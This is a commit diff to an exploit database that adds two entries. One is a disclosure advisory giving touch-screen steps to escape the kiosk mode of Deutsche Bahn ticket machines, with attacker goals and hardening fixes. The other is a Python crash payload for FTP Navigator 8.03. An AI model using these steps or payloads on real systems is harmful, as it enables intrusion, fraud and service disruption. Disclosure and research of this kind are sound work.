DB: 2019-12-20
2 changes to exploits/shellcodes FTP Navigator 8.03 - 'Custom Command' Denial of Service (SEH) Deutsche Bahn Ticket Vending Machine Local Kiosk - Privilege Escalation
This commit is contained in:
parent
b7471ba451
commit
012657c6b9
3 changed files with 294 additions and 0 deletions
266
exploits/hardware/webapps/47796.txt
Normal file
266
exploits/hardware/webapps/47796.txt
Normal file
|
@ -0,0 +1,266 @@
|
||||||
|
# Exploit Title: Deutsche Bahn Ticket Vending Machine Local Kiosk - Privilege Escalation
|
||||||
|
# Date: 2019-12-18
|
||||||
|
# Exploit Author: Vulnerability-Lab
|
||||||
|
# Vendor Homepage: https://www.bahn.de/db_vertrieb/view/leistungen/automaten-fahrkartenentwerter.shtml
|
||||||
|
# Tested on: Windows XP
|
||||||
|
|
||||||
|
Document Title:
|
||||||
|
===============
|
||||||
|
Deutsche Bahn Ticket Vending Machine - Local Kiosk Privilege Escalation Vulnerability
|
||||||
|
|
||||||
|
|
||||||
|
References (Source):
|
||||||
|
====================
|
||||||
|
https://www.vulnerability-lab.com/get_content.php?id=2191
|
||||||
|
|
||||||
|
Vulnerability Magazine:
|
||||||
|
https://www.vulnerability-db.com/?q=articles/2019/12/13/zero-day-vulnerability-deutsche-bahn-ticket-machine-series-system-uncovered
|
||||||
|
|
||||||
|
|
||||||
|
Release Date:
|
||||||
|
=============
|
||||||
|
2019-12-14
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Laboratory ID (VL-ID):
|
||||||
|
====================================
|
||||||
|
2191
|
||||||
|
|
||||||
|
|
||||||
|
Common Vulnerability Scoring System:
|
||||||
|
====================================
|
||||||
|
6.4
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Class:
|
||||||
|
====================
|
||||||
|
Privilege Escalation
|
||||||
|
|
||||||
|
|
||||||
|
Product & Service Introduction:
|
||||||
|
===============================
|
||||||
|
Customers can buy tickets at our ticket machines at any time, regardless
|
||||||
|
of opening hours. Thus, the vending machine also
|
||||||
|
secures sales in rural areas.
|
||||||
|
|
||||||
|
- innovatively designed user guidance
|
||||||
|
- Real-time timetable information for rail traffic
|
||||||
|
- traveler information
|
||||||
|
- ticket paper supply
|
||||||
|
- free fault hotline: 0800 2886644
|
||||||
|
- Professional and contemporary maintenance
|
||||||
|
|
||||||
|
The ticket vending machine can also be configured according to
|
||||||
|
individual requirements. The housing can be designed as desired.
|
||||||
|
Customers can purchase their tickets with different means of payment.
|
||||||
|
User guidance is available in different languages.
|
||||||
|
|
||||||
|
(Copy of the Homepage:
|
||||||
|
https://www.bahn.de/db_vertrieb/view/leistungen/automaten-fahrkartenentwerter.shtml
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
Abstract Advisory Information:
|
||||||
|
==============================
|
||||||
|
The vulnerability laboratory core research team discovered a local kiosk
|
||||||
|
privilege escalation vulnerability in the deutsche bahn ticket vending
|
||||||
|
machine series with windows xp.
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Disclosure Timeline:
|
||||||
|
==================================
|
||||||
|
2019-12-14: Public Disclosure (Vulnerability Laboratory)
|
||||||
|
|
||||||
|
|
||||||
|
Discovery Status:
|
||||||
|
=================
|
||||||
|
Published
|
||||||
|
|
||||||
|
|
||||||
|
Exploitation Technique:
|
||||||
|
=======================
|
||||||
|
Local
|
||||||
|
|
||||||
|
|
||||||
|
Severity Level:
|
||||||
|
===============
|
||||||
|
Medium
|
||||||
|
|
||||||
|
|
||||||
|
Authentication Type:
|
||||||
|
====================
|
||||||
|
No authentication (guest)
|
||||||
|
|
||||||
|
|
||||||
|
User Interaction:
|
||||||
|
=================
|
||||||
|
No User Interaction
|
||||||
|
|
||||||
|
|
||||||
|
Disclosure Type:
|
||||||
|
================
|
||||||
|
Responsible Disclosure Program
|
||||||
|
|
||||||
|
|
||||||
|
Technical Details & Description:
|
||||||
|
================================
|
||||||
|
A kiosk mode escalation vulnerability has been discovered in the
|
||||||
|
official deutsche bahn ticket vending machine series for windows.
|
||||||
|
The security vulnerability allows local attackers to bypass the kiosk
|
||||||
|
mode to compromise the local file system and applications.
|
||||||
|
|
||||||
|
It is possible for local attackers to break out of the kiosk mode of the
|
||||||
|
Deutsche Bahn vending machine application if
|
||||||
|
the Password Agent (PasswordAgent.exe) of the system receives a timeout
|
||||||
|
or has a runtime error in the program
|
||||||
|
itself in the background. These errors can occur due to aborted
|
||||||
|
sessions, unclean logout or common errors when
|
||||||
|
using the application at system level.
|
||||||
|
|
||||||
|
In the event of a local error, attackers can bring the error message to
|
||||||
|
the foreground by pressing the number field - Cancel
|
||||||
|
during a transaction. After the error message becomes visible, the
|
||||||
|
attacker can click on a link of the error message where you
|
||||||
|
can normally see what the error report contains. The attacker will then
|
||||||
|
be redirected to a form in the error message, where he
|
||||||
|
can search for errors in a collection of microsoft articles via "Submit
|
||||||
|
/ Dont' Submit" or another link on the online path. There
|
||||||
|
the attacker clicks on it and receives the web browser. From the web
|
||||||
|
browser, the attacker retrieves the options menu and can access
|
||||||
|
the local system directory and has then the ability to compromise the
|
||||||
|
ticket vending machine with windows xp.
|
||||||
|
|
||||||
|
The error message is normally on those devices deactivated through a
|
||||||
|
hardening process of the servce provider. In that special case
|
||||||
|
the exception handling of windows was not deactivated or set to the
|
||||||
|
background, which allows the attacker to move through to other
|
||||||
|
options to finally access the file system via browser.
|
||||||
|
|
||||||
|
The ticket vending machine vulnerability requires no user interaction
|
||||||
|
and can only be exploited by local attackers with physical
|
||||||
|
device access. No keyboard or front loader opening required.
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerable System(s):
|
||||||
|
[+] Windows XP
|
||||||
|
|
||||||
|
Affected Component(s):
|
||||||
|
[+] Exception Handling (Error Message Content)
|
||||||
|
|
||||||
|
|
||||||
|
Proof of Concept (PoC):
|
||||||
|
=======================
|
||||||
|
The local vulnerability can be exploited by local attackers with
|
||||||
|
physical device access without user interaction.
|
||||||
|
For security demonstration or to reproduce the vulnerability follow the
|
||||||
|
provided information and steps below to continue.
|
||||||
|
|
||||||
|
|
||||||
|
PoC: Sheet
|
||||||
|
PasswordAgent.exe := Unexpected Error (Background) - Runtime/Session/Timeout
|
||||||
|
=> Transaction Application => Cancel := Unexpected Error (Background) -
|
||||||
|
Runtime/Session/Timeout (Front)
|
||||||
|
=> Click Error Report => Click Search Collection => Web Browser => Local
|
||||||
|
File System => PWND!
|
||||||
|
|
||||||
|
|
||||||
|
What are attackers able to do when the file system of the vending
|
||||||
|
machine is accessable thus way?
|
||||||
|
1. Inject of local malware to the ticket machine (editor / debugger /
|
||||||
|
cmd / ps - exp. ransomware/malware)
|
||||||
|
2. Local manipulation for skimming devices to assist (transmit prepares)
|
||||||
|
2. Phishing of local credentials from screen via system (db browser
|
||||||
|
application)
|
||||||
|
3. Intercept or manipulation to access card information (local file
|
||||||
|
system - sniff/extract)
|
||||||
|
4. Crash or freeze the computer system (exp. kill of process / loop script)
|
||||||
|
5. Scare or joké activities (exp. html / js to front screens with web
|
||||||
|
browser or by a new window process)
|
||||||
|
|
||||||
|
Refernece(s):
|
||||||
|
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/IMG_6457.JPG
|
||||||
|
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/IMG_6458.JPG
|
||||||
|
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/IMG_6460.JPG
|
||||||
|
|
||||||
|
|
||||||
|
Solution - Fix & Patch:
|
||||||
|
=======================
|
||||||
|
There are now several problems related to system hardening that can be
|
||||||
|
resolved:
|
||||||
|
1. It should not be possible for users with system user rights to use
|
||||||
|
the web browsers
|
||||||
|
2. The error message menu can be deactivated or completely modified
|
||||||
|
3. Some functions in menus can be deactivated by hardening (browser,
|
||||||
|
messages & Co.)
|
||||||
|
4. Check that all other tasks are always running in the background or
|
||||||
|
are being moved there permanently
|
||||||
|
5. The deutsche bahn vending machine application and user interface
|
||||||
|
should be shut down in the event of persistent errors in the foreground
|
||||||
|
6. The activities of the testing has been logged but did not triggered
|
||||||
|
any alert for defense purpose
|
||||||
|
|
||||||
|
|
||||||
|
Deutsche Bahn: Patch Rollout in Progress
|
||||||
|
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/073915298_0.png
|
||||||
|
|
||||||
|
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/dbatm78235.png
|
||||||
|
|
||||||
|
|
||||||
|
Security Risk:
|
||||||
|
==============
|
||||||
|
The security risk of the local ticket vending machine system
|
||||||
|
vulnerability is estimated as high. The bug to escalate can be easily
|
||||||
|
exploited by local interaction with the touch display to access the file
|
||||||
|
system.
|
||||||
|
|
||||||
|
|
||||||
|
Credits & Authors:
|
||||||
|
==================
|
||||||
|
Benjamin K.M. -
|
||||||
|
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.
|
||||||
|
|
||||||
|
|
||||||
|
Disclaimer & Information:
|
||||||
|
=========================
|
||||||
|
The information provided in this advisory is provided as it is without
|
||||||
|
any warranty. Vulnerability Lab disclaims all warranties,
|
||||||
|
either expressed or implied, including the warranties of merchantability
|
||||||
|
and capability for a particular purpose. Vulnerability-Lab
|
||||||
|
or its suppliers are not liable in any case of damage, including direct,
|
||||||
|
indirect, incidental, consequential loss of business profits
|
||||||
|
or special damages, even if Vulnerability-Lab or its suppliers have been
|
||||||
|
advised of the possibility of such damages. Some states do
|
||||||
|
not allow the exclusion or limitation of liability for consequential or
|
||||||
|
incidental damages so the foregoing limitation may not apply.
|
||||||
|
We do not approve or encourage anybody to break any licenses, policies,
|
||||||
|
deface websites, hack into databases or trade with stolen data.
|
||||||
|
|
||||||
|
Domains: www.vulnerability-lab.com www.vuln-lab.com
|
||||||
|
www.vulnerability-db.com
|
||||||
|
Services: magazine.vulnerability-lab.com
|
||||||
|
paste.vulnerability-db.com infosec.vulnerability-db.com
|
||||||
|
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
|
||||||
|
youtube.com/user/vulnerability0lab
|
||||||
|
Feeds: vulnerability-lab.com/rss/rss.php
|
||||||
|
vulnerability-lab.com/rss/rss_upcoming.php
|
||||||
|
vulnerability-lab.com/rss/rss_news.php
|
||||||
|
Programs: vulnerability-lab.com/submit.php
|
||||||
|
vulnerability-lab.com/register.php
|
||||||
|
vulnerability-lab.com/list-of-bug-bounty-programs.php
|
||||||
|
|
||||||
|
Any modified copy or reproduction, including partially usages, of this
|
||||||
|
file requires authorization from Vulnerability Laboratory.
|
||||||
|
Permission to electronically redistribute this alert in its unmodified
|
||||||
|
form is granted. All other rights, including the use of other
|
||||||
|
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
|
||||||
|
All pictures, texts, advisories, source code, videos and other
|
||||||
|
information on this website is trademark of vulnerability-lab team & the
|
||||||
|
specific authors or managers. To record, list, modify, use or
|
||||||
|
edit our material contact (admin@ or research@) to get a ask permission.
|
||||||
|
|
||||||
|
Copyright © 2019 | Vulnerability Laboratory - [Evolution
|
||||||
|
Security GmbH]™
|
||||||
|
|
||||||
|
--
|
||||||
|
VULNERABILITY LABORATORY - RESEARCH TEAM
|
||||||
|
SERVICE: www.vulnerability-lab.com
|
26
exploits/windows/dos/47794.py
Executable file
26
exploits/windows/dos/47794.py
Executable file
|
@ -0,0 +1,26 @@
|
||||||
|
# Exploit Title: FTP Navigator 8.03 - 'Custom Command' Denial of Service (SEH)
|
||||||
|
# Date: 2019-12-18
|
||||||
|
# Exploit Author: Chris Inzinga
|
||||||
|
# Vendor Homepage: http://www.internet-soft.com/
|
||||||
|
# Software Link: https://www.softpedia.com/dyn-postdownload.php/5edd515b8045f156a9dd48599c2539e5/5dfa4560/d0c/0/1
|
||||||
|
# Version: 8.03
|
||||||
|
# Tested on: Windows 7 SP1 (x86)
|
||||||
|
|
||||||
|
# Steps to reproduce:
|
||||||
|
# 1. Generate a malicious payload via the POC
|
||||||
|
# 2. In the application click "FTP - Server" > "Custom Command"
|
||||||
|
# 3. Paste the contents of the PoC file into the input box below SERVER LIST and press "Do it!"
|
||||||
|
# 4. Observe a program DOS crash, overwriting SEH
|
||||||
|
|
||||||
|
#!/usr/bin/python
|
||||||
|
|
||||||
|
payload = "A" * 4108 + "B" * 4 + "C" * 40
|
||||||
|
|
||||||
|
try:
|
||||||
|
fileCreate =open("exploit.txt","w")
|
||||||
|
print("[x] Creating file")
|
||||||
|
fileCreate.write(payload)
|
||||||
|
fileCreate.close()
|
||||||
|
print("[x] File created")
|
||||||
|
except:
|
||||||
|
print("[!] File failed to be created")
|
|
@ -6624,6 +6624,7 @@ id,file,description,date,author,type,platform,port
|
||||||
47771,exploits/windows/dos/47771.c,"Lenovo Power Management Driver 1.67.17.48 - 'pmdrvs.sys' Denial of Service (PoC)",2019-12-12,"Nassim Asrir",dos,windows,
|
47771,exploits/windows/dos/47771.c,"Lenovo Power Management Driver 1.67.17.48 - 'pmdrvs.sys' Denial of Service (PoC)",2019-12-12,"Nassim Asrir",dos,windows,
|
||||||
47786,exploits/windows/dos/47786.py,"XnView 2.49.1 - 'Research' Denial of Service (PoC)",2019-12-18,ZwX,dos,windows,
|
47786,exploits/windows/dos/47786.py,"XnView 2.49.1 - 'Research' Denial of Service (PoC)",2019-12-18,ZwX,dos,windows,
|
||||||
47791,exploits/macos/dos/47791.txt,"macOS 10.14.6 (18G87) - Kernel Use-After-Free due to Race Condition in wait_for_namespace_event()",2019-12-18,"Google Security Research",dos,macos,
|
47791,exploits/macos/dos/47791.txt,"macOS 10.14.6 (18G87) - Kernel Use-After-Free due to Race Condition in wait_for_namespace_event()",2019-12-18,"Google Security Research",dos,macos,
|
||||||
|
47794,exploits/windows/dos/47794.py,"FTP Navigator 8.03 - 'Custom Command' Denial of Service (SEH)",2019-12-19,"Chris Inzinga",dos,windows,
|
||||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||||
|
@ -42101,3 +42102,4 @@ id,file,description,date,author,type,platform,port
|
||||||
47787,exploits/hardware/webapps/47787.txt,"Xerox AltaLink C8035 Printer - Cross-Site Request Forgery (Add Admin)",2019-12-18,"Ismail Tasdelen",webapps,hardware,
|
47787,exploits/hardware/webapps/47787.txt,"Xerox AltaLink C8035 Printer - Cross-Site Request Forgery (Add Admin)",2019-12-18,"Ismail Tasdelen",webapps,hardware,
|
||||||
47789,exploits/asp/webapps/47789.txt,"Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting",2019-12-18,"Harshit Shukla",webapps,asp,
|
47789,exploits/asp/webapps/47789.txt,"Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting",2019-12-18,"Harshit Shukla",webapps,asp,
|
||||||
47793,exploits/aspx/webapps/47793.txt,"Telerik UI - Remote Code Execution via Insecure Deserialization",2019-12-18,"Bishop Fox",webapps,aspx,
|
47793,exploits/aspx/webapps/47793.txt,"Telerik UI - Remote Code Execution via Insecure Deserialization",2019-12-18,"Bishop Fox",webapps,aspx,
|
||||||
|
47796,exploits/hardware/webapps/47796.txt,"Deutsche Bahn Ticket Vending Machine Local Kiosk - Privilege Escalation",2019-12-19,Vulnerability-Lab,webapps,hardware,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue